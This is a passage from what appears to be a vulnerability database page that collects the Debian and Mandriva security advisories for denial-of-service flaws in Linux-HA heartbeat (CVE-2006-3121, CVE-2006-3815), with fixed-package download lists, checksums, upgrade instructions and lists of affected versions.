    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith-dev_1.2.4-2ubuntu0.2_sparc.deb
      Size/MD5:    32238 884d357c9090519c59e5a8ea1e522e66
    http://security.ubuntu.com/ubuntu/pool/main/h/heartbeat/libstonith0_1.2.4-2ubuntu0.2_sparc.deb
      Size/MD5:    95846 f63ac7f74cbb963617bededd1e8709e5
    http://security.ubuntu.com/ubuntu/pool/universe/h/heartbeat/stonith_1.2.4-2ubuntu0.2_sparc.deb
      Size/MD5:    39080 cc7a891f39c33ac01aae1beab0a74de3

- 漏洞信息 (F49309)

Debian Linux Security Advisory 1151-1 (PacketStormID:F49309)
2006-08-27 00:00:00
Debian  debian.org
advisory,remote,denial of service
linux,debian
CVE-2006-3121
[点击下载]

Debian Security Advisory 1151-1 - Yan Rong Ge discovered out-of-boundary memory access in heartbeat, the subsystem for High-Availability Linux. This could be used by a remote attacker to cause a denial of service.

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1151-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
August 15th, 2006                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : heartbeat
Vulnerability  : out-of-bounds read
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3121

Yan Rong Ge discovered out-of-boundary memory access in heartbeat, the
subsystem for High-Availability Linux.  This could be used by a remote
attacker to cause a denial of service.

For the stable distribution (sarge) this problem has been fixed in
version 1.2.3-9sarge6.

For the unstable distribution (sid) this problem has been fixed in
version 1.2.4-14 and heartbeat-2 2.0.6-2.

We recommend that you upgrade your heartbeat packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6.dsc
      Size/MD5 checksum:      881 d083828302c007e3f48d23c00b971c4a
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6.diff.gz
      Size/MD5 checksum:   272913 34f413808e51132452d097a4439c427b
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3.orig.tar.gz
      Size/MD5 checksum:  1772513 9fd126e5dff51cc8c1eee223c252a4af

  Architecture independent components:

    http://security.debian.org/pool/updates/main/h/heartbeat/ldirectord_1.2.3-9sarge6_all.deb
      Size/MD5 checksum:    45592 c3a399270f0058e117a45d0de5a8a4d8

  Alpha architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_alpha.deb
      Size/MD5 checksum:   574520 d195b85287c1fb7da669425b7b39257e
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_alpha.deb
      Size/MD5 checksum:   150886 f9bf2b4ad7dfb76ec7a4596beb5d1469
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_alpha.deb
      Size/MD5 checksum:    71162 96345eb81faf3fe5bd4277052be2c0f0
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_alpha.deb
      Size/MD5 checksum:    54188 9e2c557050aa18440b4913ec34906aba
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_alpha.deb
      Size/MD5 checksum:    31346 377df9bb5df6f3cacb74b7c1671b7be2
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_alpha.deb
      Size/MD5 checksum:    94380 9d03b1b411072b410327045060c7a56b
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_alpha.deb
      Size/MD5 checksum:    31808 4bfb4c6237b41a03e795258702b35825

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_amd64.deb
      Size/MD5 checksum:   531482 fd87fc8f357157fa31e62b5fb008dbb8
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_amd64.deb
      Size/MD5 checksum:   126342 90642418d9d22026f49bc093998c0485
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_amd64.deb
      Size/MD5 checksum:    61970 f4105bf377ade8b92964608cd5dfefe8
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_amd64.deb
      Size/MD5 checksum:    52664 8af92202a899dc12877dbfa293166e4b
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_amd64.deb
      Size/MD5 checksum:    30182 f1f0b78a04840285cef5cbe17e05fef7
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_amd64.deb
      Size/MD5 checksum:    89204 310ae86ee33e1073374fb4793414e42f
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_amd64.deb
      Size/MD5 checksum:    31214 d9de528bb5eed624ffe662293998adaa

  ARM architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_arm.deb
      Size/MD5 checksum:   498570 736f6ac4023d1305cd425873ef3ca883
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_arm.deb
      Size/MD5 checksum:   123844 4ba7d987dc59211a092e43ab46f17852
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_arm.deb
      Size/MD5 checksum:    63450 4770eeb7b8625657279740741adf20c3
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_arm.deb
      Size/MD5 checksum:    49306 eb6b5496908099e80445552bde0f979c
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_arm.deb
      Size/MD5 checksum:    30076 f289bfe886db5e5ea1ad741aa450e0ee
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_arm.deb
      Size/MD5 checksum:    77666 5536846297be58cece4c573b19e54641
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_arm.deb
      Size/MD5 checksum:    30502 c643322be02c29b587c5ad58f7fa2a58

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_i386.deb
      Size/MD5 checksum:   493820 a9fa59fd95800b1b3cba55fc496af823
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_i386.deb
      Size/MD5 checksum:   117884 7dc7c013ac2ef041cfc427a5765fe581
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_i386.deb
      Size/MD5 checksum:    59166 27f8e46499ec8714e084980592c05073
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_i386.deb
      Size/MD5 checksum:    48344 a735cc6d2e9ec8285551f2acc5c14e33
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_i386.deb
      Size/MD5 checksum:    29822 e937918722380aafd408b7ef18f95089
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_i386.deb
      Size/MD5 checksum:    79418 ec35f3a3adb54b898419f5a26226c94f
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_i386.deb
      Size/MD5 checksum:    30664 993f4504ea2f4586b237d70242f36de9

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_ia64.deb
      Size/MD5 checksum:   648352 2a4f6375e4149d6006de43a34f7adfe7
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_ia64.deb
      Size/MD5 checksum:   152936 f29e6683b8736c743f0d4a08f1951b47
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_ia64.deb
      Size/MD5 checksum:    74414 037149137986bd16ceeb33c7b5f0f60b
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_ia64.deb
      Size/MD5 checksum:    62668 cd7e4868ff73730cf9487cf2292ed27e
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_ia64.deb
      Size/MD5 checksum:    31476 6b6a8a08f8af10b6b2d42efb5c146c52
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_ia64.deb
      Size/MD5 checksum:   104846 cb1c38107bc784f3ab4c652473edf077
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_ia64.deb
      Size/MD5 checksum:    32728 f66c4a631e28f00879a2d60e11e6f7f3

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_hppa.deb
      Size/MD5 checksum:   550676 067f08c90c1111ae0cbbec080f909512
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_hppa.deb
      Size/MD5 checksum:   136172 d7da401f120cdb124d2e681849083f9e
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_hppa.deb
      Size/MD5 checksum:    68464 ae4adbbf6202f4588f10704dba795dc5
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_hppa.deb
      Size/MD5 checksum:    55824 2bcaf92a27603cdeb992c0d6bf71356b
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_hppa.deb
      Size/MD5 checksum:    30588 864b8953d61caa9cb6ffbb696cc927a5
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_hppa.deb
      Size/MD5 checksum:    93064 a7fbaa226bd1252b069332938a88947a
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_hppa.deb
      Size/MD5 checksum:    31668 d061190a34802c9d2a7ea3c9f1d88498

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_m68k.deb
      Size/MD5 checksum:   480790 840769425f55c6cdd97507b3bfb6f142
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_m68k.deb
      Size/MD5 checksum:   113788 9f1e8590fa5de4a876e3897a7d32155f
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_m68k.deb
      Size/MD5 checksum:    56760 78749698fa2aff0880049b3cbfdee08c
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_m68k.deb
      Size/MD5 checksum:    48550 45e314c58b86fc6ccf4e628d7377ef83
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_m68k.deb
      Size/MD5 checksum:    29718 f5d66cb3b2a122eef39f0f3fbd414403
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_m68k.deb
      Size/MD5 checksum:    82178 83e95fed1f013ddf358156de838e8bad
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_m68k.deb
      Size/MD5 checksum:    30494 6a7a6905a2335422ae31dfcf4d879379

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_mips.deb
      Size/MD5 checksum:   536554 3377cffae67bab58654d92d080ea1697
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_mips.deb
      Size/MD5 checksum:   132814 757e3712c557b447565fb9cc6a205eab
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_mips.deb
      Size/MD5 checksum:    65738 fc92cf20294b757c4d2cfc0a344b5902
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_mips.deb
      Size/MD5 checksum:    48604 24052fc62dd7aff3924c5a85f6ef1b15
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_mips.deb
      Size/MD5 checksum:    30410 ef396d9f75cffd648a713b1a3c362812
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_mips.deb
      Size/MD5 checksum:    80896 77752bc698895f18a0e429744a633eb4
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_mips.deb
      Size/MD5 checksum:    32884 f468efecd8ff46d4a90b83cd4894fcfd

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_mipsel.deb
      Size/MD5 checksum:   537074 4df7e373140e290919a7004dc3790d9c
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_mipsel.deb
      Size/MD5 checksum:   132952 3865ec5c0071bd7f6ce401add6b959dd
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_mipsel.deb
      Size/MD5 checksum:    65512 7083e53ffe0d9a3cb78213633c2af1f8
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_mipsel.deb
      Size/MD5 checksum:    48828 11a5cce8684fcc8149eda6eaf9620803
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_mipsel.deb
      Size/MD5 checksum:    30446 0fb61518677f26b3c2878d0714790d9c
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_mipsel.deb
      Size/MD5 checksum:    80810 c2398611934c12275098f09694e5ac9f
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_mipsel.deb
      Size/MD5 checksum:    32870 32cc6fce3014529096411756b4d57945

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_powerpc.deb
      Size/MD5 checksum:   556184 5891968d5eba4ea2f9a476909250821b
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_powerpc.deb
      Size/MD5 checksum:   127844 ba8968c6108b491eef2e044a1d56d2a1
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_powerpc.deb
      Size/MD5 checksum:    62070 82a343e85907f67ab852fd15cd3d75a6
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_powerpc.deb
      Size/MD5 checksum:    53762 218b913d3ed1ec934bfc31fefb516fba
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_powerpc.deb
      Size/MD5 checksum:    30322 00be4caa2fb72c2637f0e282e5aa24ea
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_powerpc.deb
      Size/MD5 checksum:    98990 eab1bda109b6ed16d6c7c2eb25befe8a
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_powerpc.deb
      Size/MD5 checksum:    33488 abed7e73d85b30cb5979e9ea110a2ba2

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_s390.deb
      Size/MD5 checksum:   530588 d0aac8ee9b90ebc7bea535d5ff9ae783
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_s390.deb
      Size/MD5 checksum:   126948 33afc772ebcb54f29445be2d09e46f2a
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_s390.deb
      Size/MD5 checksum:    62658 d4d7b32388054c0d196f4886eaa88c36
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_s390.deb
      Size/MD5 checksum:    53116 c049b56da5442a203b031004fa5e9b91
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_s390.deb
      Size/MD5 checksum:    30202 1d809e534f02fb026266ef8abbe437f4
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_s390.deb
      Size/MD5 checksum:    85100 d2a18af5ce9e92fbc2e924d54770b99a
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_s390.deb
      Size/MD5 checksum:    31156 9bc1139f0dee68e3e258e01e26cfdd6a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat_1.2.3-9sarge6_sparc.deb
      Size/MD5 checksum:   501106 292fbdbaa991897731c6c0fbdd37562d
    http://security.debian.org/pool/updates/main/h/heartbeat/heartbeat-dev_1.2.3-9sarge6_sparc.deb
      Size/MD5 checksum:   121414 69a8f299f2ee1e7110a5ccdfdbf2a028
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils-dev_1.2.3-9sarge6_sparc.deb
      Size/MD5 checksum:    63206 51dcb360568d37a8fcfc0d8f97a5230b
    http://security.debian.org/pool/updates/main/h/heartbeat/libpils0_1.2.3-9sarge6_sparc.deb
      Size/MD5 checksum:    50292 b22dbb2ddb648c648d41d8fd094fc3d3
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith-dev_1.2.3-9sarge6_sparc.deb
      Size/MD5 checksum:    30050 03839874b8c50ad7ff58b58bcbdbad06
    http://security.debian.org/pool/updates/main/h/heartbeat/libstonith0_1.2.3-9sarge6_sparc.deb
      Size/MD5 checksum:    81448 44b58ff3dae2fabd018cd89864219250
    http://security.debian.org/pool/updates/main/h/heartbeat/stonith_1.2.3-9sarge6_sparc.deb
      Size/MD5 checksum:    30592 f6c6d3008225e0266a8e0974c03043e9


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFE4X4+W5ql+IAeqTIRAmYnAJ9HrFOA7q8pCgTroWAuoivKlZgYnQCff9oO
kLf7CMca+mjUGijgffldSMY=
=N1Q7
-----END PGP SIGNATURE-----

- 漏洞信息 (F49305)

Mandriva Linux Security Advisory 2006.142 (PacketStormID:F49305)
2006-08-27 00:00:00
Mandriva  mandriva.com
advisory,vulnerability
linux,mandriva
CVE-2006-3121,CVE-2006-3815
[点击下载]

Mandriva Linux Security Advisory MDKSA-2006-142 - Two vulnerabilities by Yan Rong Ge in heartbeat versions prior to 2.0.6.

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:142
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : heartbeat
 Date    : August 14, 2006
 Affected: 2006.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 Two vulnerabilities in heartbeat prior to 2.0.6 was discovered by Yan
 Rong Ge.  The first is that heartbeat would set insecure permissions in
 an shmget call for shared memory, allowing a local attacker to cause an
 unspecified denial of service via unknown vectors (CVE-2006-3815).
 
 The second is a remote vulnerability that could allow allow the master
 control process to read invalid memory due to a specially crafted
 heartbeat message and die of a SEGV, all prior to any authentication
 (CVE-2006-3121).
 
 Updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3121
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3815
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 7797a304e73645cb0dd518936b6a0d59  2006.0/RPMS/heartbeat-1.2.3-5.2.20060mdk.i586.rpm
 9024d2ddeabed550864f4087f5d1203a  2006.0/RPMS/heartbeat-ldirectord-1.2.3-5.2.20060mdk.i586.rpm
 0cc86c13aa345167fc28732ad8d4c488  2006.0/RPMS/heartbeat-pils-1.2.3-5.2.20060mdk.i586.rpm
 32ae04a5e100527f28005cc95d58bab3  2006.0/RPMS/heartbeat-stonith-1.2.3-5.2.20060mdk.i586.rpm
 0b0c39c8f6bc55a1742346c2ab74d476  2006.0/RPMS/libheartbeat0-1.2.3-5.2.20060mdk.i586.rpm
 a4306e4730d23f7c44cde38148d2fbf0  2006.0/RPMS/libheartbeat0-devel-1.2.3-5.2.20060mdk.i586.rpm
 d9ed984f7044b1fd895bf48a17646149  2006.0/RPMS/libheartbeat-pils0-1.2.3-5.2.20060mdk.i586.rpm
 893136133c78f81f45c5a46b90bd56f6  2006.0/RPMS/libheartbeat-pils0-devel-1.2.3-5.2.20060mdk.i586.rpm
 fc48ae914852b91d25e204df5013ea88  2006.0/RPMS/libheartbeat-stonith0-1.2.3-5.2.20060mdk.i586.rpm
 27dba06cd918f4e44e7316f37c0728e1  2006.0/RPMS/libheartbeat-stonith0-devel-1.2.3-5.2.20060mdk.i586.rpm
 ec184261c2b75735f245058cc102875b  2006.0/SRPMS/heartbeat-1.2.3-5.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 ceefc3ca6b8bfd9e5342c7e57c9d22de  x86_64/2006.0/RPMS/heartbeat-1.2.3-5.2.20060mdk.x86_64.rpm
 056f0fc351514d5daf25e8b7c0dac268  x86_64/2006.0/RPMS/heartbeat-ldirectord-1.2.3-5.2.20060mdk.x86_64.rpm
 511ed82622928343faa187cd4be07b23  x86_64/2006.0/RPMS/heartbeat-pils-1.2.3-5.2.20060mdk.x86_64.rpm
 ccedb1fac9aa393d83b1e261b83ca32e  x86_64/2006.0/RPMS/heartbeat-stonith-1.2.3-5.2.20060mdk.x86_64.rpm
 bbb2d50dabbf3c782282403e185e3ed3  x86_64/2006.0/RPMS/lib64heartbeat0-1.2.3-5.2.20060mdk.x86_64.rpm
 e960d1a0be192e27325e8080ff805d30  x86_64/2006.0/RPMS/lib64heartbeat0-devel-1.2.3-5.2.20060mdk.x86_64.rpm
 3806435d23c0d78c01f095349098ab32  x86_64/2006.0/RPMS/lib64heartbeat-pils0-1.2.3-5.2.20060mdk.x86_64.rpm
 56f6f6748b15477595954cf62fb1be4f  x86_64/2006.0/RPMS/lib64heartbeat-pils0-devel-1.2.3-5.2.20060mdk.x86_64.rpm
 1b7ec3e3232f92f4798f1f27e791f5fa  x86_64/2006.0/RPMS/lib64heartbeat-stonith0-1.2.3-5.2.20060mdk.x86_64.rpm
 b4eba13e67ddb63f4e945fd3623b70dc  x86_64/2006.0/RPMS/lib64heartbeat-stonith0-devel-1.2.3-5.2.20060mdk.x86_64.rpm
 ec184261c2b75735f245058cc102875b  x86_64/2006.0/SRPMS/heartbeat-1.2.3-5.2.20060mdk.src.rpm

 Corporate 3.0:
 cedaede52beb3d048afe667f26c38fde  corporate/3.0/RPMS/heartbeat-1.2.3-2.3.C30mdk.i586.rpm
 bc8a44f9c3bbc42ae092da7f738af2c4  corporate/3.0/RPMS/heartbeat-ldirectord-1.2.3-2.3.C30mdk.i586.rpm
 a0f4b51b272f037c17fba097784d7177  corporate/3.0/RPMS/heartbeat-pils-1.2.3-2.3.C30mdk.i586.rpm
 cf113ac1f2847706f3a69c7b809f62ea  corporate/3.0/RPMS/heartbeat-stonith-1.2.3-2.3.C30mdk.i586.rpm
 93fd800765604254140a6f067d482c8b  corporate/3.0/RPMS/libheartbeat0-1.2.3-2.3.C30mdk.i586.rpm
 2dbb453665fcb6386734f5b9150b92e8  corporate/3.0/RPMS/libheartbeat0-devel-1.2.3-2.3.C30mdk.i586.rpm
 718bf907afe2cee9677395082905cd77  corporate/3.0/RPMS/libheartbeat-pils0-1.2.3-2.3.C30mdk.i586.rpm
 44b21aad591fe193b9e7236cbbfce967  corporate/3.0/RPMS/libheartbeat-pils0-devel-1.2.3-2.3.C30mdk.i586.rpm
 3a421e29c6c74fe75d3b5a47a32a1003  corporate/3.0/RPMS/libheartbeat-stonith0-1.2.3-2.3.C30mdk.i586.rpm
 44b30593b986755b6805474251c0b843  corporate/3.0/RPMS/libheartbeat-stonith0-devel-1.2.3-2.3.C30mdk.i586.rpm
 362a30fb09bd24d2507a030d82e3d020  corporate/3.0/SRPMS/heartbeat-1.2.3-2.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 b5c12159643089bfc87aeb4e08719467  x86_64/corporate/3.0/RPMS/heartbeat-1.2.3-2.3.C30mdk.x86_64.rpm
 dec8e2ef290fb9fbcf0515478aab2a96  x86_64/corporate/3.0/RPMS/heartbeat-ldirectord-1.2.3-2.3.C30mdk.x86_64.rpm
 4816a2dbc933099da9e6d8969fac9395  x86_64/corporate/3.0/RPMS/heartbeat-pils-1.2.3-2.3.C30mdk.x86_64.rpm
 a5b482fe798f98eeb1cb702898807560  x86_64/corporate/3.0/RPMS/heartbeat-stonith-1.2.3-2.3.C30mdk.x86_64.rpm
 1fb38b260833c55999be24fbf63a3aac  x86_64/corporate/3.0/RPMS/lib64heartbeat0-1.2.3-2.3.C30mdk.x86_64.rpm
 f3ebccf215e1e96cb35c252db87bcd80  x86_64/corporate/3.0/RPMS/lib64heartbeat0-devel-1.2.3-2.3.C30mdk.x86_64.rpm
 8ff7be0054b3a529facc33004f5f6d0f  x86_64/corporate/3.0/RPMS/lib64heartbeat-pils0-1.2.3-2.3.C30mdk.x86_64.rpm
 bc7419d6d959e8088c5c2a39c0adcc4d  x86_64/corporate/3.0/RPMS/lib64heartbeat-pils0-devel-1.2.3-2.3.C30mdk.x86_64.rpm
 04716c3769327dc854ad8425cfe08233  x86_64/corporate/3.0/RPMS/lib64heartbeat-stonith0-1.2.3-2.3.C30mdk.x86_64.rpm
 16beaa0ad35f93a1e750d0e7f71a7e3c  x86_64/corporate/3.0/RPMS/lib64heartbeat-stonith0-devel-1.2.3-2.3.C30mdk.x86_64.rpm
 362a30fb09bd24d2507a030d82e3d020  x86_64/corporate/3.0/SRPMS/heartbeat-1.2.3-2.3.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFE4Md0mqjQ0CJFipgRArKMAJ47bA0Ei+FRD9gfIsaTaBnvMCokmACg09Xp
X7+Aj9VhwpZtOTiRJFwClSU=
=5nFb
-----END PGP SIGNATURE-----

- 漏洞信息

27955
Heartbeat Unspecified Remote DoS
Remote / Network Access Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-08-16 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.0.7, 1.2.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux-HA Heartbeat Remote Denial of Service Vulnerability
Design Error 19516
Yes No
2006-08-13 12:00:00 2008-01-31 02:47:00
This vulnerability was discovered by Yan Rong Ge. forloop discovered that BlueCat Networks Adonis includes a vulnerable version of Linux-HA.

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Linux-HA heartbeat 2.0.6
Linux-HA heartbeat 2.0.5
Linux-HA heartbeat 2.0.4
Linux-HA heartbeat 2.0.3
Linux-HA heartbeat 2.0.2
Linux-HA heartbeat 2.0.1
Linux-HA heartbeat 2.0
Linux-HA heartbeat 1.2.4
Linux-HA heartbeat 1.2.3
- Debian Linux 3.1 sparc
 - Debian Linux 3.1 s/390
 - Debian Linux 3.1 ppc
 - Debian Linux 3.1 mipsel
 - Debian Linux 3.1 mips
 - Debian Linux 3.1 m68k
 - Debian Linux 3.1 ia-64
 - Debian Linux 3.1 ia-32
 - Debian Linux 3.1 hppa
 - Debian Linux 3.1 arm
 - Debian Linux 3.1 alpha
 - Debian Linux 3.1
Linux-HA heartbeat 1.2.2
Linux-HA heartbeat 0.9.4 d
Linux-HA heartbeat 0.9.4
Linux-HA heartbeat 0.4.9 c
Linux-HA heartbeat 0.4.9 b
Linux-HA heartbeat 0.4.9 a
Linux-HA heartbeat 0.4.9 .1
+ Conectiva Linux 8.0
Linux-HA heartbeat 0.4.9
- Debian Linux 3.0 sparc
 - Debian Linux 3.0 s/390
 - Debian Linux 3.0 ppc
 - Debian Linux 3.0 mipsel
 - Debian Linux 3.0 mips
 - Debian Linux 3.0 m68k
